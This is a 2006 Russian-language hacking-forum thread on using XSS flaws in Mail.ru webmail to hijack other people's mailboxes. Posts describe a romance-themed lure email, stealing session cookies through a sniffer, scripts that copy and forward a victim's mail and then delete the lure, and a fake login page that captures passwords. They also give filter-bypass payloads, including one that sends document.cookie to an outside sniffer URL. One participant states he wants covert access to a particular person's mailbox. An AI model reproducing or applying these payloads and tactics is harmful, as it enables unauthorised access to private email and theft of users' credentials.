ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.08.2006, 04:47
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Берёшь абсолютно любое видео на античате, из раздела XSS и на примере mail.ru.
Всё о чём шла речь выше - это способы запустить свой скрипт в браузере жертвы. На практике делается так, отправляется письмо в котором маскируется XSS.. Пользователь получает письмо от некой дамы, например "Katrin", с непонятной темой "MRA"... Девушек то все любят, да и намеки в каждой фразе видят, времена такие.. Открывает и читает:
Privet.. Ya tebe nikogda ne pisala,no sey4as ya buhaya i sama ne znau 4em zanatsa..Daje v translite piwu ot nefig delat.Vot ogladivaus na svou jizn. Molodaya, simpatichnaya, a 4ego-to vse ravno ne hvataet.. Vernee kogo-to. Net, ne podumay, eto ne priznanie v lubvi.. Mi s toboy daje ne znakomi.. I vovse ne sposob poznakomitsa s toboy.. Hota kto ego znaet 4to budet dalwe. Piwu na slu4ainiy yawik, daje ne uverena 4to ti muj4ina.. Samoe glavnoe 4to ya ho4u tebe skazat - po4awe osmatrivaisa, skolko vokrug takih kak ya, molodih, simpatichnih i odinokih? Mojet esli ya hotabi odnogo 4elove4ka zastavlu zadumatsa, to moya jizn stanet lu4we, zna4it ewe ne vse poterano dla lubvi v etom mire.. Ladno, ne zabivay sebe golovu moimi mislami, prosto oglanis i zadumaisa nad etim mirom..
А пока он читает, работает код из этого же письма... Всё зависит от фантазии злоумышленника.
Что это может быть??? Да что угодно. Самое банальное, это отправить куки на сниффер и ручками их подменить, а потом спокойно, не вводя никаких паролей попасть в чужой ящик. Никаких знаний практически не нужно, а XSS можно узнать у более сведующих товарищей.
Более продвинутым считается написание скриптов, которые всё сделают за тебя.. Говоря конкретно о mail.ru по собственному опыту: копия всех писем имеющихся в ящике + настройка пересылки всех входящих на твой ящик + удаление письма с сервера. Юзер прочтёт, а при попытке обновить/удалить/переслать увидит надпись "Сообщение удалено с сервера"... Теперь иди свищи и рассказывай, что было, вот только куда-то делось.. Это очень трудоёмкая работа, требующая определенных навыков в програмировании и понимание основ взаимодействия с веб-сервером (запросы, методы аутентификации).
Самые творческие и авантюрные личности идут ещё дальше =) Они используя XSS, перемещают пользователя на поддельную страничку.. Мол произошла ошибка, сессия потеряна.. Страничка в мейловском дизайне, ничего подозрительного, реклама как обычно... После ввода пароля реально перекидывает обратно в ящик... Вот только введённые вами данные уже ушли к хакеру на мыло.
А можно всё совместить =) Вопрос ваших знаний.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 02.08.2006 в 04:52..
|
|
|
02.08.2006, 05:10
|
|
Познающий
Регистрация: 06.09.2005
Сообщений: 67
Провел на форуме:
215526
Репутация:
85
|
|
Dronga, на Mail.ru разве нет защиты от CSRF?
|
|
|
|
02.08.2006, 06:00
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Сообщение от Kanick
Dronga, на Mail.ru разве нет защиты от CSRF?
Если ничего не изменилось, то защита имеется, но очень убогая. Всё сводится к проверке кук и реферера. Куки есть, а подделать рефку средствами php не проблема. Единственное что, опционально имеется возможность запрета заходов с разных IP в рамках одной сессии.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 02.08.2006 в 06:08..
|
|
|
|
03.08.2006, 23:37
|
|
Новичок
Регистрация: 07.05.2006
Сообщений: 7
Провел на форуме:
5670
Репутация:
1
|
|
Drongo, нет-нет, теорию я то знаю, да и видео у меня есть про это, так вот как вообще заюзать сам вредоносный код, имею хсс в майле, можно подробнее
|
|
|
|
Отправил нижеследующее по аське Dronge, но пока ответа не дождался :( |
29.08.2006, 03:37
|
|
Новичок
Регистрация: 27.08.2006
Сообщений: 1
Провел на форуме:
1189
Репутация:
0
|
|
Отправил нижеследующее по аське Dronge, но пока ответа не дождался :(
Хочу спросить по поводу XSS в Mail.Ru.
Если я правильно понял, то вот такой вариант уже не катит:
PHP код:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('1')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(2)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('4')>
Я честно попробовал перебить это в десятичную кодировку, получилось что-то типа этого:
PHP код:
<img src="http
://img.mail.ru
/mail/ru/image
s/dumb.gif>"on
error=alert('TEXT'
)>
Поперебирал разные комбинации, но - облом. Был бы у меня декодер - я бы и в шестнадцатиричной попробовал.
Вот я и хочу узнать, это у меня глюки (я, правда, сначала тестил под SP-2, и только потом под незапатченным IE6) или эту дыру заделали?
Может, хотя бы намекнёшь, в какую сторону чесать репу? Я, блин, даже ответ на секретный вопрос знаю, но юзать его нельзя - чел мониторит ящик каждый день, ну и я тоже хотел бы рядом пристроиться  )) |
|
|
|
16.09.2006, 11:45
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Ну чтож... Продолжая демонстрировать интересные и не очень (кому как) способы обхода фильтра, выкладываю следующую XSS. Конечно же, в таком виде она уже не применима для @mail.ru, но...
Код:
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:
img=new Image();
img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
В основе данной XSS лежит то, что многие браузеры, в частности IE и Opera, парсят XML. Фильтр пропускал эту конструкцию потому что не видел в ней слова javascript =) А вот браузер видел.. Взяв справочник по XML ты легко разберешься что и почему =)
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
|
|
|
|
18.09.2006, 01:59
|
|
Banned
Регистрация: 17.09.2006
Сообщений: 7
Провел на форуме:
4671
Репутация:
0
|
|
Очень познавательно! Респект! Надо будет попробывать
|
|
|
|
07.10.2006, 09:21
|
|
Banned
Регистрация: 13.12.2005
Сообщений: 28
Провел на форуме:
186245
Репутация:
-12
|
|
вот запалнаю все как надо и код вставлаю а мне пишет Error in connect (SOCKET)
4о делат ктонит потскажет
|
|
|
|
07.10.2006, 09:50
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
кажется бага уже прикрыта
|
|
|
|
05.11.2006, 10:08
|
|
Участник форума
Регистрация: 01.10.2006
Сообщений: 172
Провел на форуме:
1680584
Репутация:
73
|
|
молодцы ребята mail.ru быстро работают
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
admin mail.ru
|
ISRAEL |
Чужие Статьи |
42 |
10.08.2005 05:54 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
